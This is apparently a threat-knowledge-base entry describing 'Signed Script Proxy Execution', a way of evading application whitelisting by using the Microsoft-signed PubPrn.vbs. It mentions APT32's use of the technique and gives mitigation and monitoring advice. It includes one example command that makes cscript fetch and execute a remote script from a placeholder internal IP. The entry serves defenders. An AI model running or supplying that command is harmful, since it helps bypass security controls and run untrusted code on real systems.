Signed Script Proxy Execution
|Signed Script Proxy Execution|
|Tactic||Defense Evasion, Execution|
|Data Sources||Process monitoring, Process command-line parameters|
|Defense Bypassed||Application whitelisting, Digital Certificate Validation|
Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.
PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.1 Example command:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png
There are several other signed scripts that may be used in a similar manner.2
- APT32 has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.3
Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.
Monitor script processes, such as cscript, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.